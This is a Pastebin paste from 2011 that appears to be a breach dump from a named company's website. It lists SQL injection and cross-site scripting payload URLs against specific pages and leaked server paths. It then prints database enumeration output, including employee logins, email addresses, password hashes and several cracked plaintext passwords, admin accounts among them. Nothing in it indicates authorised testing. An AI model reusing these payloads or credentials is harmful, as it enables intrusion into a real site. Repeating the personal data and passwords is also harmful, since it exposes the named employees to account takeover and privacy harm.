API tools faq
paste
Advertisement
sroub3k

comprousa.com

sroub3k
Jul 25th, 2011
1,008
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.30 KB | None | 0 0
raw download clone embed print report
  1. *--------------------------------------------------------------------------------------*
  2. Boolean Based SQL Injection
  3. http://www.comprousa.com/en/news_view.php?id=-1 OR 17-7=10
  4. *--------------------------------------------------------------------------------------*
  5. [High Possibility] SQL Injection
  6. http://www.comprousa.com/en/news_view.php?id=%27
  7. http://www.comprousa.com/en/admin/img.php?news=1&id=%27
  8. *--------------------------------------------------------------------------------------*
  9. XSS - Cross-site Scripting
  10. http://www.comprousa.com/en/faq/s500.php?'"--></style></script><script>alert(0x0004BA)</script>
  11. http://www.comprousa.com/en/ipcam_preview/check.html?p='"--></style></script><script>alert(0x001502)</script>
  12. *--------------------------------------------------------------------------------------*
  13. Password Transmitted Over HTTP
  14. http://www.comprousa.com/en/ipcam_preview/check.html?p=ip70
  15. *--------------------------------------------------------------------------------------*
  16. Cookie Not Marked As HttpOnly
  17. http://www.comprousa.com/en/buy_mail.php
  18. *--------------------------------------------------------------------------------------*
  19. Programming Error Message - http://www.comprousa.com/en/admin/news_admin.php
  20. <b>Warning</b>: mysql_close(): supplied argument is not a valid MySQL-Link
  21. resource in <b>/home1/comprous/public_html/comprousa/en/admin/news_admin.php</b> on line <b>209</b>
  22. *--------------------------------------------------------------------------------------*
  23. Possible] Internal IP Address Leakage - http://www.comprousa.com/en/faq/support/support.html
  24. 192.168.0.164
  25. *--------------------------------------------------------------------------------------*
  26. [Possible] Internal Path Leakage (*nix) - http://www.comprousa.com/en/faq/support/error_log
  27. /usr/lib/php:/usr/local/lib/php
  28. *--------------------------------------------------------------------------------------*
  29. http://www.comprousa.com/en/admin/pctv_category.php
  30. /usr/lib64/php:/usr/lib/php:/usr/share/pear
  31. *--------------------------------------------------------------------------------------*
  32. http://www.comprousa.com/en/images/error_log
  33. /usr/local/lib/php/extensions/no-debug-non-zts-20060613/pdo.so
  34. /usr/local/lib/php/extensions/no-debug-non-zts-20060613/pdo.so:
  35. /usr/local/lib/php/extensions/no-debug-non-zts-20060613/sqlite.so
  36. /usr/local/lib/php/extensions/no-debug-non-zts-20060613/sqlite.so:
  37. /usr/local/lib/php/extensions/no-debug-non-zts-20060613/pdo_sqlite.so
  38. /usr/local/lib/php/extensions/no-debug-non-zts-20060613/pdo_sqlite.so:
  39. /usr/local/lib/php/extensions/no-debug-non-zts-20060613/pdo_mysql.so
  40. /usr/local/lib/php/extensions/no-debug-non-zts-20060613/pdo_mysql.so:
  41. *--------------------------------------------------------------------------------------*
  42.  
  43. Web Server: Apache / Powered-by: PHP/5.2.17 / DB Server: MySQL
  44. =
  45. information_schema -USER_PRIVILEGES - 'comprous_compro'@'localhost'
  46. =
  47. Data Base Found: information_schema
  48. Data Base Found: comprous_compro
  49. Data Base Found: comprous_drupal
  50. Data Base Found: comprous_feedback
  51. Data Base Found: comprous_iso
  52. Data Base Found: comprous_warranty
  53. Data Base Found: comprous_wheretobuy
  54. Data Base Found: comprous_wordpress
  55. =
  56.  
  57. Data Base: comprous_wordpress
  58.  
  59. Columns found:
  60. ID,user_login,user_pass,user_nicename,user_email,user_url,
  61. user_registered,user_activation_key,user_status,display_name
  62.  
  63. Count(*) of comprous_wordpress.wp_users is 13
  64.  
  65. Data Found: ID=1
  66. Data Found: user_login=admin
  67. Data Found: user_pass=$P$Bn6RS3JCoNQYn.28RhJ3jrgZhbhyYp/ password: comproadmin
  68. Data Found: user_nicename=admin
  69. Data Found: user_email=service@comprousa.com
  70. Data Found: user_url=
  71. Data Found: user_registered=2010-02-05 01:19:52
  72. Data Found: user_activation_key=
  73. Data Found: user_status=0
  74. Data Found: display_name=admin
  75.  
  76. Data Found: ID=10
  77. Data Found: user_login=FAE
  78. Data Found: user_pass=$P$BQi7M15nsYhsenRTj7Ll4nnD/HC53U1
  79. Data Found: user_nicename=fae
  80. Data Found: user_email=carlos@comprousa.com
  81. Data Found: user_url=
  82. Data Found: user_registered=2010-02-12 05:42:38
  83. Data Found: user_activation_key=
  84. Data Found: user_status=0
  85. Data Found: display_name=FAE
  86.  
  87. Data Found: ID=12
  88. Data Found: user_login=Hans
  89. Data Found: user_pass=$P$BLs8RKsimH2NDasGx3sbE4ZtU6kzt.1
  90. Data Found: user_nicename=hans
  91. Data Found: user_email=hans@comprousa.com
  92. Data Found: user_url=
  93. Data Found: user_registered=2010-02-23 03:30:53
  94. Data Found: user_activation_key=
  95. Data Found: user_status=0
  96. Data Found: display_name=Hans
  97.  
  98. Data Found: ID=14
  99. Data Found: user_login=Johnson
  100. Data Found: user_pass=$P$BCzag.UeXph1fw7znG7PFujf6gYmbI0
  101. Data Found: user_nicename=johnson
  102. Data Found: user_email=johnson@comprousa.com
  103. Data Found: user_url=
  104. Data Found: user_registered=2010-02-25 08:37:49
  105. Data Found: user_activation_key=
  106. Data Found: user_status=0
  107. Data Found: display_name=Johnson
  108.  
  109. Data Found: ID=16
  110. Data Found: user_login=Mike
  111. Data Found: user_pass=$P$BuE6gni57ogB6/5iAGyTJwWduIBnes0
  112. Data Found: user_nicename=mike
  113. Data Found: user_email=mike@comprousa.com
  114. Data Found: user_url=
  115. Data Found: user_registered=2010-03-01 11:32:38
  116. Data Found: user_activation_key=
  117. Data Found: user_status=0
  118. Data Found: display_name=Mike
  119.  
  120. Data Found: ID=17
  121. Data Found: user_login=Caroline
  122. Data Found: user_pass=$P$BNkKaPsN22hMJf8pCAXvDCO9QxaYDg0
  123. Data Found: user_nicename=caroline
  124. Data Found: user_email=caroline@comprousa.com
  125. Data Found: user_url=
  126. Data Found: user_registered=2010-03-01 11:33:51
  127. Data Found: user_activation_key=
  128. Data Found: user_status=0
  129. Data Found: display_name=Caroline
  130.  
  131. Data Found: ID=18
  132. Data Found: user_login=Jenny
  133. Data Found: user_pass=$P$BEJRj6.EzbSBAkQIfvkZVOiwiVFMAI1
  134. Data Found: user_nicename=jenny
  135. Data Found: user_email=jenny@comprousa.com
  136. Data Found: user_url=
  137. Data Found: user_registered=2010-03-01 11:34:25
  138. Data Found: user_activation_key=
  139. Data Found: user_status=0
  140. Data Found: display_name=Jenny
  141.  
  142. Data Found: ID=19
  143. Data Found: user_login=Kevin
  144. Data Found: user_pass=$P$BbXoP7KSfTXNCFB./4xJwXf97WP3jN0
  145. Data Found: user_nicename=kevin
  146. Data Found: user_email=kevin@comprousa.com
  147. Data Found: user_url=
  148. Data Found: user_registered=2010-03-01 11:35:00
  149. Data Found: user_activation_key=
  150. Data Found: user_status=0
  151. Data Found: display_name=Kevin
  152.  
  153. Data Found: ID=20
  154. Data Found: user_login=Victor
  155. Data Found: user_pass=$P$BrryaW5vpqJyTS.ykg7mpL6LvxaY700
  156. Data Found: user_nicename=victor
  157. Data Found: user_email=victor@comprousa.com
  158. Data Found: user_url=
  159. Data Found: user_registered=2010-04-08 02:10:05
  160. Data Found: user_activation_key=
  161. Data Found: user_status=0
  162. Data Found: display_name=Victor
  163.  
  164. Data Found: ID=21
  165. Data Found: user_login=Roder
  166. Data Found: user_pass=$P$B.xPh67A0OKounWxjLdGnSC6MAikda. password: roder123
  167. Data Found: user_nicename=roder
  168. Data Found: user_email=roder@comprousa.com
  169. Data Found: user_url=
  170. Data Found: user_registered=2010-04-08 03:06:31
  171. Data Found: user_activation_key=
  172. Data Found: user_status=0
  173. Data Found: display_name=Roder
  174.  
  175. Data Found: ID=22
  176. Data Found: user_login=KevinSu
  177. Data Found: user_pass=$P$Bvloym3itPzvkfPn0D.H22E1Cf5lxt1
  178. Data Found: user_nicename=kevinsu
  179. Data Found: user_email=kevin_su@comprousa.com
  180. Data Found: user_url=
  181. Data Found: user_registered=2010-05-06 05:33:16
  182. Data Found: user_activation_key=
  183. Data Found: user_status=0
  184. Data Found: display_name=Kevin Su
  185.  
  186. Data Found: ID=23
  187. Data Found: user_login=Alice
  188. Data Found: user_pass=$P$BhZrCf6NdLHlrSdoYMu3.sg8GAdkmM1
  189. Data Found: user_nicename=alice
  190. Data Found: user_email=alice@comprousa.com
  191. Data Found: user_url=
  192. Data Found: user_registered=2010-05-26 08:43:39
  193. Data Found: user_activation_key=
  194. Data Found: user_status=0
  195. Data Found: display_name=Alice
  196.  
  197. Data Found: ID=24
  198. Data Found: user_login=Jacken
  199. Data Found: user_pass=$P$BxU4HkN9GxqsJUqPuBauHqu20MUK68.
  200. Data Found: user_nicename=jacken
  201. Data Found: user_email=jacken@comprousa.com
  202. Data Found: user_url=
  203. Data Found: user_registered=2010-07-15 05:21:52
  204. Data Found: user_activation_key=
  205. Data Found: user_status=0
  206. Data Found: display_name=Jacken
  207. *--------------------------------------------------------------------------------*
  208. Data Base comprous_feedback
  209. Table: user_table
  210. username password realname email password
  211. admin 24e3961e9d6c1a41326c2c7df2a0b904 System Administrator support@comprousa.com comproadmin
  212. support 40fcc6cf7bfc065fcdd48d4e9dbd70c4 support support@comprousa.com supportgroup
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!